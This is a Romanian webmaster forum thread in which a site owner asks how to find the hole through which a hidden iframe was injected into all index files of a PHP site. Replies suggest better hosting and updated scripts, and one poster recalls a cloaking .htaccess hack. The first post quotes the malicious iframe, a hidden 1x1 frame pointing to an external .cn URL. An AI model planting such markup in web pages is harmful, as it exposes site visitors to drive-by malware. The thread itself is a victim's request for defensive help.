Pagina 1 din 2 12 UltimulUltimul
Rezultate 1 la 10 din 16

Subiect: Se poate afla daca un site are sau nu vulnerabilitati?

  1. #1
    Avatarul lui thefan
    thefan este deconectat Ambasador
    Reputatie:
    37
    Data înscrierii
    30th December 2006
    Locaţie
    Oradea
    Vârstă
    48
    Posturi
    1.433
    Putere Rep
    37


    Implicit Se poate afla daca un site are sau nu vulnerabilitati?

    Salut

    Am tot cautat pe Google, dar n-am gasit nici o solutie, deci m-am decis sa intreb aici:

    Se poate testa / audita cumva o pagina web dpdv a securitatii? Ma refer la descoperirea portitelor prin care se poate introduce cod malitios in sursa paginii?

    Caz concret: e vorba de un site facut in css+html, care mai foloseste un phponline 2.1.2 (php+mysql).

    La un moment dat in toate fisierele denumite index a aparut un iframe cu continut strain:

    Cod:
    <iframe src="(Link: http:// litedownloadseek.cn/in.cgi?cocacola16)http:// litedownloadseek.cn/in.cgi?cocacola16" width=1 height=1 style="visibility: hidden"></iframe>
    N-am gasit portita inca... si site-ul apare ca "Reported attack site" de 2 saptamani (a fost curatata sursa, a fost trimisa adresa la Google pentru reconsideration dar inca fara rezultat).
    Producător de content SEO în engleză. SEO de voie, de nevoie.

  2. #2
    Avatarul lui haos
    haos este deconectat Ambasador
    Reputatie:
    61
    Data înscrierii
    19th February 2008
    Locaţie
    Craiova
    Posturi
    2.239
    Putere Rep
    61


    Implicit

    Cat oferi?
    Citeste primul meu curs SEO - principii de baza. Vezi oferta mea de advertoriale PR5.

  3. #3
    Avatarul lui thefan
    thefan este deconectat Ambasador
    Reputatie:
    37
    Data înscrierii
    30th December 2006
    Locaţie
    Oradea
    Vârstă
    48
    Posturi
    1.433
    Putere Rep
    37


    Implicit

    un forum de profitori

    Sfaturi, ceva? Pe gratis eventual
    Producător de content SEO în engleză. SEO de voie, de nevoie.

  4. #4
    Avatarul lui evolution
    evolution este deconectat Membru SeoPedia
    Reputatie:
    38
    Data înscrierii
    29th October 2006
    Locaţie
    Bucuresti
    Posturi
    997
    Putere Rep
    38


    Implicit

    Nu prea le am cu php , dar m-am apucat sa invat. Am citit chiar azi ceva despre vulnerabilitati aici .

    De ce nu muti siteul pe un server cu ultima versiune de php ? Daca nu ai descoperit cauza atacului ,se poate repeta ...

  5. #5
    Avatarul lui haos
    haos este deconectat Ambasador
    Reputatie:
    61
    Data înscrierii
    19th February 2008
    Locaţie
    Craiova
    Posturi
    2.239
    Putere Rep
    61


    Implicit

    Nu e profitori bre da nu-ti da nimeni pe gratis ce a acumulat in 15 ani. Da ca sfat vechi de cand internetul: e normal sa patesti asa cand folosesti scripturi luate de pe net, in special daca nu sunt luate de la surse de incredere.
    Incearca sa iei de pe SF daca tot iei de pe net.
    Citeste primul meu curs SEO - principii de baza. Vezi oferta mea de advertoriale PR5.

  6. #6
    Avatarul lui thefan
    thefan este deconectat Ambasador
    Reputatie:
    37
    Data înscrierii
    30th December 2006
    Locaţie
    Oradea
    Vârstă
    48
    Posturi
    1.433
    Putere Rep
    37


    Implicit

    Citat Postat în original de haos Vezi Post
    Nu e profitori bre
    No offence, glumeam

    Am cautat pe gogu dupa vulnerabilitatile scriptului phpOnline, si nu s-a documentat nici o vulnerabilitate din cate am observat...

    Apropos, acest lucru pe care l-am intalnit se numeste "cross site scripting" (XSS)?
    Ultima modificare făcută de thefan; 28th January 2009 la 17:13.
    Producător de content SEO în engleză. SEO de voie, de nevoie.

  7. #7
    Avatarul lui eugen
    eugen este deconectat Membru SeoPedia
    Reputatie:
    36
    Data înscrierii
    28th August 2006
    Locaţie
    RO
    Posturi
    436
    Putere Rep
    36


    Implicit

    Mai există şi varianta în care nu e vina scriptului, ci a administratorilor sau a altui client ( dacă e vorba de găzduire shared ).

    Şi eu am păţit ceva asemănător doar că în cazul meu mi-au fost rescrise fişierele .htaccess. Dacă intrai pe sit cu un browser vedeai o pagină "în construcţie", iar dacă erai Google sau Yahoo erai redirecţionat ( 301 ) către altă locaţie.

  8. #8
    Avatarul lui Nosfer
    Nosfer este deconectat Ambasador
    Reputatie:
    34
    Data înscrierii
    7th July 2008
    Locaţie
    Sibiu
    Vârstă
    37
    Posturi
    1.196
    Putere Rep
    34


    Implicit

    am patit si eu faza cu iFrame odata si mi-au fost infectoate toate index.php, header.php si footer.php de la multe site-uri. Am schimbat hostingul cu unul mai bun si am instalat ultimele versiuni sigure de CMS-uri si problemele au disparut. Cred ca nu e vorba de vulnerabilitatea site-ului ci de vulnerabilitatea serverului pe care e hostat.

  9. #9
    Avatarul lui evolution
    evolution este deconectat Membru SeoPedia
    Reputatie:
    38
    Data înscrierii
    29th October 2006
    Locaţie
    Bucuresti
    Posturi
    997
    Putere Rep
    38


    Implicit

    Cand cineva are nevoie de ajutor pt ca i-a fost spart siteul sau whatever, nu e etic sa ii ceri bani.Poti sa ii dai macar niste indicii.

    Daca vroia sa isi faca un site cu jocuri poker sau felicitari cred ca era altceva.

    In fine , fiecare are morala si etica sa, dar roata se invarte tot timpul , daca ati observat

  10. #10
    Avatarul lui GExGE
    GExGE este deconectat Membru SeoPedia
    Reputatie:
    37
    Data înscrierii
    13th June 2005
    Locaţie
    Bucuresti
    Vârstă
    39
    Posturi
    373
    Putere Rep
    37


    Implicit

    Lectura placuta: http://www.docstoc.com/docs/1195753/php-security

    (oarecum offtopic)
    moviereads.com - flip pages, not content

Pagina 1 din 2 12 UltimulUltimul

Informații subiect

Utilizatori care navighează în acest subiect

Momentan este/sunt 1 utilizator(i) care navighează în acest subiect. (0 membrii și 1 vizitatori)

Thread-uri Similare

  1. un sfat daca se poate
    De mariuslmm în forumul Adsense
    Răspunsuri: 15
    Ultimul Post: 12th January 2008, 20:10
  2. Ce se poate intampla daca...
    De BeFree în forumul Discutii generale privind optimizarea si motoarele de cautare
    Răspunsuri: 0
    Ultimul Post: 12th January 2008, 14:55
  3. Răspunsuri: 4
    Ultimul Post: 12th December 2007, 13:51
  4. Se poate afla ?
    De hyp3rion în forumul DMOZ
    Răspunsuri: 22
    Ultimul Post: 17th May 2007, 01:03
  5. Cum Pot Afla Daca Site-ul Mi-a Fost Respins?
    De Stelian în forumul DMOZ
    Răspunsuri: 2
    Ultimul Post: 22nd February 2006, 18:00

Permisiuni postare

  • Nu puteţi posta subiecte noi.
  • Nu puteţi răspunde la subiecte
  • Nu puteţi adăuga ataşamente
  • Nu puteţi modifica posturile proprii
  •